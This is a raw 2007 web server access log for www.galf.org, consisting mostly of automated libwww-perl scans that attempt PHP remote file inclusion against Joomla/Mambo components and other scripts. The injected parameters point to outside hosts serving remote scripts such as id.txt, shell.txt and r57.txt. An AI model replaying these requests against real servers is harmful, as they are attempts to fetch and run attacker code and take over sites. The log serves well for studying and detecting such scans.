83.170.97.200 - - [03/Sep/2007:02:03:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:03:27 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:05:47 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:05:47 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:05:47 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:05:47 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:05:54 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:05:55 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:05:56 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:05:57 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.162.134.131 - - [03/Sep/2007:02:06:12 -0700] "GET /logs/access_070716.log/includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/endang_mardiati/cek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:06:32 -0700] "GET /logs/access_070618.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:06:35 -0700] "GET /logs/access_070611.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:06:38 -0700] "GET /logs/access_070618.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:06:38 -0700] "GET /logs/access_070618.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:06:39 -0700] "GET /logs/access_070611.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:06:40 -0700] "GET /logs/access_070611.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:06:40 -0700] "GET /logs/access_070618.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:06:42 -0700] "GET /logs/access_070611.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.162.134.131 - - [03/Sep/2007:02:09:20 -0700] "GET /logs/access.log/includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/endang_mardiati/cek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:10:24 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:10:33 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:02:10:51 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:10:55 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.32.113.242 - - [03/Sep/2007:02:11:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.32.113.242 - - [03/Sep/2007:02:11:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.108 - - [03/Sep/2007:02:11:09 -0700] "GET /logs/access_070409.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:02:14:33 -0700] "GET /logs/access.log/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.3.104.138 - - [03/Sep/2007:02:30:38 -0700] "GET //index.php?pagina=http://www.ssis.cz/img/y?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
91.3.104.138 - - [03/Sep/2007:02:30:40 -0700] "GET /logs//index.php?pagina=http://www.ssis.cz/img/y?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
87.238.162.143 - - [03/Sep/2007:02:32:59 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.143 - - [03/Sep/2007:02:32:59 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.3.104.138 - - [03/Sep/2007:02:36:51 -0700] "GET /logs/access.log//index.php?pagina=http://www.ssis.cz/img/y?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
91.3.104.138 - - [03/Sep/2007:02:36:52 -0700] "GET /logs/access_070716.log//index.php?pagina=http://www.ssis.cz/img/y?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
87.238.162.143 - - [03/Sep/2007:02:44:19 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.143 - - [03/Sep/2007:02:44:19 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:02:50:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:02:50:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.149.160.66 - - [03/Sep/2007:02:53:30 -0700] "GET /logs/access_070305.log HTTP/1.1" 200 4239318 "http://www.google.fi/search?q=80.70.236.34&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:fi:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "www.galf.org"
212.149.160.66 - - [03/Sep/2007:02:53:31 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "www.galf.org"
41.196.183.10 - - [03/Sep/2007:02:54:00 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.eg/search?hl=ar&q=galf+&btnG=%D8%A8%D8%AD%D8%AB+Google%E2%80%8F&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:02:58:40 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:02:58:40 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:02:59:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:02:59:15 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:02:41 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:02:41 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:03:54 -0700] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:03:54 -0700] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [03/Sep/2007:03:05:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://opersconexion.port5.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:03:17:43 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:03:17:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:03:17:44 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:19:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:19:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [03/Sep/2007:03:19:37 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://opersconexion.port5.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [03/Sep/2007:03:19:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://opersconexion.port5.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [03/Sep/2007:03:20:42 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://opersconexion.port5.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
83.103.114.158 - - [03/Sep/2007:03:23:08 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 4087522 "-" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) (Debian)" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:03:27:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:03:27:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:03:27:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:03:27:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.28.204 - - [03/Sep/2007:03:32:54 -0700] "GET /logs/access_070618.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:43:41 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:43:42 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.79.162.162 - - [03/Sep/2007:03:48:33 -0700] "GET /logs/index.php?p=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [03/Sep/2007:03:48:33 -0700] "GET /index.php?p=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:48:54 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:03:48:59 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.79.162.162 - - [03/Sep/2007:03:50:04 -0700] "GET /logs/index.php?go=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [03/Sep/2007:03:50:04 -0700] "GET /index.php?go=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.79.162.162 - - [03/Sep/2007:03:55:13 -0700] "GET /logs/template.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.162.162 - - [03/Sep/2007:03:55:13 -0700] "GET /template.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
198.31.50.157 - - [03/Sep/2007:03:59:14 -0700] "GET /index.php?file=http://212.241.213.113/aku.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.168.228.204 - - [03/Sep/2007:04:03:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://geocities.com/bajingan_cintah/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.226.188.4 - - [03/Sep/2007:04:03:18 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://indir.savsak.com/shell.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.galf.org"
218.111.176.115 - - [03/Sep/2007:04:04:03 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 4087522 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
81.168.228.204 - - [03/Sep/2007:04:04:08 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/bajingan_cintah/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:05:57 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:05:57 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:05:57 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:04:11:08 -0700] "GET /logs/index2.php?url_page=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.20.231.1 - - [03/Sep/2007:04:11:10 -0700] "GET /index2.php?url_page=http://www.globalspex.com/support/helpdocs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.244 - - [03/Sep/2007:04:16:29 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.244 - - [03/Sep/2007:04:16:29 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.17.100.88 - - [03/Sep/2007:04:17:51 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:17:51 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:17:51 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.17.100.88 - - [03/Sep/2007:04:18:51 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:04:18:51 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
189.142.68.206 - - [03/Sep/2007:04:20:29 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
64.38.59.34 - - [03/Sep/2007:04:20:42 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.59.34 - - [03/Sep/2007:04:20:42 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.39.114 - - [03/Sep/2007:04:22:01 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.39.114 - - [03/Sep/2007:04:22:02 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.195.79.252 - - [03/Sep/2007:04:25:20 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.195.79.252 - - [03/Sep/2007:04:25:20 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.195.79.252 - - [03/Sep/2007:04:25:20 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
86.35.137.236 - - [03/Sep/2007:04:25:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://s140610136.onlinehome.fr/hotmail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.35.137.236 - - [03/Sep/2007:04:25:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://s140610136.onlinehome.fr/hotmail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.219.170.122 - - [03/Sep/2007:04:25:50 -0700] "GET /logs/index.php?go=http://www.geocities.com/ryan_doyok/cmdkoe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.219.170.122 - - [03/Sep/2007:04:25:51 -0700] "GET /index.php?go=http://www.geocities.com/ryan_doyok/cmdkoe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.195.79.252 - - [03/Sep/2007:04:26:22 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.12.31.79 - - [03/Sep/2007:04:27:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.etriple.com/sc/comandi/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.79 - - [03/Sep/2007:04:27:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.etriple.com/sc/comandi/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.17.2.146 - - [03/Sep/2007:04:27:55 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [03/Sep/2007:04:27:59 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [03/Sep/2007:04:28:00 -0700] "GET /logs/access_070716.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [03/Sep/2007:04:29:03 -0700] "GET /logs/access_070604.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
189.142.68.206 - - [03/Sep/2007:04:29:51 -0700] "GET /logs/access.log HTTP/1.0" 200 124559 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
189.142.68.206 - - [03/Sep/2007:04:30:06 -0700] "GET /logs/access_070625.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
189.142.68.206 - - [03/Sep/2007:04:30:07 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
189.142.68.206 - - [03/Sep/2007:04:31:46 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 377600 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
194.51.100.250 - - [03/Sep/2007:04:32:13 -0700] "GET /logs/access_070611.log//modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.51.100.250 - - [03/Sep/2007:04:32:14 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
